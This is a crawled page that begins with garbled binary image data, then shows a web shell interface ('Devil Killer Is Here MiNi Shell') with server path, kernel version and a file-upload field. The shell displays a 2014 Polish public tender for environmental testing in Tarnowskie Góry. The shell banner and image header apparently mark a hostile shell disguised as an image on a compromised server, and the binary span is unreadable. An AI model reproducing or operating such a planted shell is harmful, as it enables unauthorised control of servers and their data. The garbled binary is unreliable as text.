JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141017/220431-N-2014.html

<p class="kh_header"><b>Tarnowskie Góry: Wykonanie badań i opracowanie wyników w ramach kontynuacji projektu pod nazwą: Właściwe zarządzanie środowiskiem gwarantem bezpieczeństwa i zdrowia mieszkańców Powiatu Tarnogórskiego</b><br>
<b>Numer ogłoszenia: 220431 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Tarnogórski , ul. Karłuszowiec 5, 42-600 Tarnowskie Góry, woj. śląskie, tel. 032 3813786, faks 032 3813727.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.tarnogorski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie badań i opracowanie wyników w ramach kontynuacji projektu pod nazwą: Właściwe zarządzanie środowiskiem gwarantem bezpieczeństwa i zdrowia mieszkańców Powiatu Tarnogórskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres zamówienia:
1) Część pierwsza:
a) badanie wód powierzchniowych (obejmujące pobór prób wody i wykonanie analiz oraz opracowanie wyników badań w zestawieniu z dopuszczalnymi wartościami poszczególnych badanych wskaźników wynikających z obowiązujących przepisów prawa),
b) sporządzanie sprawozdań kwartalnych i rocznych (opracowanie wyników) przedstawiających szczegółową analizę i wnioski wynikające z wyników badań, 
c) szczegółowy opis przedmiotu zamówienia znajduje się w zał. nr 10 do specyfikacji istotnych warunków zamówienia - SIWZ,
2) Część druga:
a) badanie powietrza (obejmujące pomiar i wykonanie analiz oraz opracowanie wyników badań w zestawieniu z dopuszczalnymi wartościami poszczególnych badanych wskaźników wynikających z obowiązujących przepisów prawa),
b) sporządzanie sprawozdań kwartalnych i rocznych (opracowanie wyników)  obejmujących szczegółową analizę i wnioski wynikające z wyników badań,
c) szczegółowy opis przedmiotu zamówienia znajduje się w zał. nr 11 do SIWZ,
3) Część trzecia:
a) badanie gleb (obejmujące pobór prób gleby i wykonanie analiz),
b) sporządzanie sprawozdania (opracowanie wyników) obejmującego szczegółową analizę i wnioski wynikające z wyników badań,
c) szczegółowy opis przedmiotu zamówienia znajduje się w zał. nr 12 do SIWZ,
2. W przypadku wystąpienia nieprzewidywalnych przyczyn związanych z przyczynami środowiskowymi Zamawiający zastrzega sobie prawo zmiany zakresu i częstotliwości wybranych badań (określonych w zakresie zamówienia).
3. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
4. Warunki dotyczące przedmiotu zamówienia: W wypadku zauważonych wad w dokumentacji po odbiorze Zamawiający powiadomi Wykonawcę, a ten usunie wady bezpłatnie w terminie nie dłuższym niż 30 dni roboczych. Z tytułu usunięcia stwierdzonych usterek lub wad Wykonawcy nie przysługuje dodatkowe wynagrodzenie.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.71.15.00-9, 90.71.45.00-0, 90.71.50.00-2, 90.73.00.00-3, 90.73.10.00-0, 90.73.14.00-4, 90.73.31.00-5, 90.74.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości odpowiednio:
1) 3000,00 zł (słownie: trzy tysiące złotych 00/100) - przy ofercie na badanie wód powierzchniowych i sporządzanie sprawozdań kwartalnych i rocznych - CZĘŚĆ 1,
2) 3000,00 zł (słownie: trzy tysiące złotych 00/100) - przy ofercie na badanie powietrza i sporządzanie sprawozdań kwartalnych i rocznych - CZĘŚĆ 2,
3) 2500,00 zł (słownie: dwa tysiące pięćset złotych 00/100) - przy ofercie na badanie gleb i sporządzenie sprawozdania - CZĘŚĆ 3</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składający ofertę ma wykazać posiadanie niezbędnej wiedzy i doświadczenia do wykonania zamówienia, a w szczególności ma wykazać, że wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych również wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum jedną usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, tzn. Zamawiający wymaga, aby Wykonawca składający ofertę na:
- część pierwszą wykazał minimum jedno zamówienie obejmujące badanie wód powierzchniowych (w zakresie: oznaczania zawartości wskaźników) o wartości przynajmniej 10 000, 00 zł brutto,
- część drugą wykazał minimum jedno zamówienie obejmujące badanie metali ciężkich w powietrzu o wartości przynajmniej 10 000, 00 zł brutto,
- część trzecią wykazał minimum jedno zamówienie obejmujące badanie metali ciężkich w glebie o wartości przynajmniej 50 000, 00 zł brutto.
Na potwierdzenie spełnienia w/w warunku Wykonawca ma przedłożyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie (według załącznika nr 8 do SIWZ). W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia oceniane będzie ich łączne posiadanie niezbędnej wiedzy i doświadczenia - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnienie tego warunku).
Dowodami, o których mowa powyżej są:
- poświadczenia, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 m-ce przed upływem terminu składania ofert,
- oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie (w załączniku nr 8 do SIWZ) zostały wcześniej wykonane Wykonawca nie ma obowiązku przekładania dowodów, o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składający ofertę ma wykazać dysponowanie osobami zdolnymi do wykonania  przedmiotu zamówienia, a w szczególności ma wykazać, że dysponuje:
a) co najmniej jedną osobę z wyższym wykształceniem posiadającą co najmniej 5 lat doświadczenia zawodowego w zakresie badań środowiskowych, w tym co najmniej 2 lata doświadczenia w pracach laboratoryjnych analitycznych,
b) co najmniej jedną osobę z wyższym wykształceniem posiadającą co najmniej 5 lat doświadczenia zawodowego w zakresie badań środowiskowych, w tym co najmniej 2 lata doświadczenia w pracach badawczych i studialnych  z zakresu monitoringu środowiska. 
W celu potwierdzenia spełnienia powyższego warunku Wykonawca zobowiązany jest wskazać te osoby, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami wraz  z oświadczeniem, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeśli ustawy nakładają obowiązek posiadania takich uprawnień (według załącznika nr 9 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3), zastępuje się je dokumentem, zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego, odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem. Termin ważności dokumentów analogicznie jak w pkt III.4.3).
2. Wykonawca składa wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu i braku podstaw do wykluczenia sporządzone według wzoru stanowiącwego załącznik nr 7 do SIWZ. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców przedmiotowe oświadczenia mogą być złożone wspólnie i podpisane przez upoważnionych przedstawicieli każdego z tych Wykonawców, lub przez Pełnomocnika upoważnionego do reprezentowania w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia lub reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
3. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie oświadczeń i dokumentów złożonych przez Wykonawcę wraz z ofertą, z zastrzeżeniem art. 26, ust. 3 ustawy.
4. Wykonawca jest zobowiązany wykazać nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy i braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy.
5.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
6. Kompletna oferta musi zawierać:
1) formularz ofertowy, sporządzony na podstawie wzoru stanowiącego załącznik nr 1, i/lub załącznik nr 2, i/lub załącznik nr 3 do SIWZ,
2) stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru lub innych dokumentów złożonych z ofertą,
3) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego,
4) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej,
5) aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
6) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne, społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
7) oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu i braku podstaw do wykluczenia z postępowania, sporządzone na podstawie wzoru stanowiącego załącznik nr 7 do SIWZ,
8) wykaz zamówień według wzoru stanowiącego załącznik nr 8 oraz dowody,
9) oświadczenie o podwykonawstwie, według wzoru stanowiącego załącznik nr 13 do SIWZ. Brak oświadczenia będzie równoznaczny z wykonaniem przedmiotu zamówienia bez udziału podwykonawców,
10) parafowaną lub podpisaną treść istotnych postanowień umowy stanowiącą załącznik nr 4 i/lub załącznik nr 5, i/lub załącznik nr 6 do SIWZ,
11) listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2007 r., nr 50, poz. 331 ze zm.) albo informację o tym, że wykonawca nie należy do grupy kapitałowej zgodnie z załącznikiem nr 14 do SIWZ,
12) wykaz osób wraz z oświadczeniem, zgodnie z załącznikiem nr 9 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy na skutek okoliczności, które powodują, że zmiany będą konieczne z punktu widzenia interesów Wykonawcy lub Zamawiającego  w szczególności w zakresie:
1) zmiany terminu wykonania zamówienia spowodowane przedłużeniem terminu zakończenia postępowania o udzielenie zamówienia np. w przypadku przesunięcia przez Zamawiającego terminu otwarcia ofert lub terminu związania ofertą,
2) zmiany danych zarówno po stronie Zamawiającego jak i Wykonawcy, w sytuacji gdy w trakcie obowiązywania umowy zajdą takie zmiany,
3) zmiany warunków płatności i wynagrodzenia w przypadku zmian powszechnie obowiązujących przepisów prawa w trakcie realizacji umowy, w szczególności dotyczących przepisów podatkowych lub regulacji dotyczących wykorzystania środków budżetowych, lub innych przyczyn niezależnych od Wykonawcy i Zamawiającego, w szczególności tych, których nie dało się przewidzieć w chwili zawarcia umowy,
4) zmiany osób wykonujących zamówienie, wskazanych w ofercie w następujących przypadkach:
a) nie wywiązywania się z obowiązków lub nienależytego ich wykonywania,
b) choroby lub innych zdarzeń losowych,
c) jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Zamawiającego i Wykonawcy (np. rezygnacja),
Nowa osoba musi spełniać warunek udziału w postępowaniu, w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
5) innych niż wymienione wyżej, ale z zastrzeżeniem art. 140 ust. 3 ustawy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.tarnogorski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Tarnowskich Górach, ul. Karłuszowiec 5, Wydział Organizacyjny (pok. 114) lub pocztą po otrzymaniu pisemnego wniosku o jej przekazanie. SIWZ jest bezpłatna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2014 godzina 09:30, miejsce: Oferty należy składać w budynku Starostwa Powiatowego w Tarnowskich Górach,  ul. Karłuszowiec 5 (Kancelaria pok. nr 1).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Kategoria usług: 16.
2. TERMIN WYKONANIA ZAMÓWIENIA. Przedmiot zamówienia należy zrealizować w terminie:
1. Prace części pierwszej i części drugiej zakresu zamówienia: od dnia zawarcia umowy, ale nie wcześniej niż od dnia 01.01.2015 r. do dnia 31.12.2018 r., z uwzględnieniem zapisów zawartych poniżej w ust. 2
2. Wyniki prac części pierwszej i części drugiej zakresu zamówienia będą:
1) przekazywane Zamawiającemu co kwartał w formie wyników badań w zestawieniu z dopuszczalnymi wartościami poszczególnych badanych wskaźników wynikających z obowiązujących przepisów prawa:
do 15 dnia miesiąca następującego po upływie każdego kolejnego kwartału badań, przy czym ostatnie sprawozdanie przekazanie zostanie w terminie do 15 grudnia 2018r,
2) przekazywane Zamawiającemu w formie sprawozdań rocznych obejmujących szczegółową analizę i wnioski wynikające z wyników badań: do dnia 31 stycznia 2016, 2017, 2018 r i 20 grudnia 2018 r. 
3. Prace części trzeciej zakresu zamówienia: od dnia zawarcia umowy, ale nie wcześniej niż od dnia 01.01.2015 r. do dnia 30.11.2015 r. z uwzględnieniem zapisów zawartych poniżej w ust. 4. Badanie gleby należy zakończyć do dnia  30.09.2015 r.
4. Wyniki prac części trzeciej zakresu zamówienia będą: przekazane Zamawiającemu w formie jednorazowego sprawozdania z opracowaniem wyników badań po zakończeniu prowadzonych badań: do dnia 30 listopada 2015 roku.
3. Zgodnie z art. 22 ust. 1 ustawy, o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
2) posiadania wiedzy i doświadczenia,
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
4) sytuacji ekonomicznej i finansowej.
4. Dopuszcza się składanie ofert częściowych, na część 1 i/lub część 2 i/lub część 3.
5. Nie dopuszcza się składania ofert wariantowych.
6. Zamawiający nie przewiduje zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy.
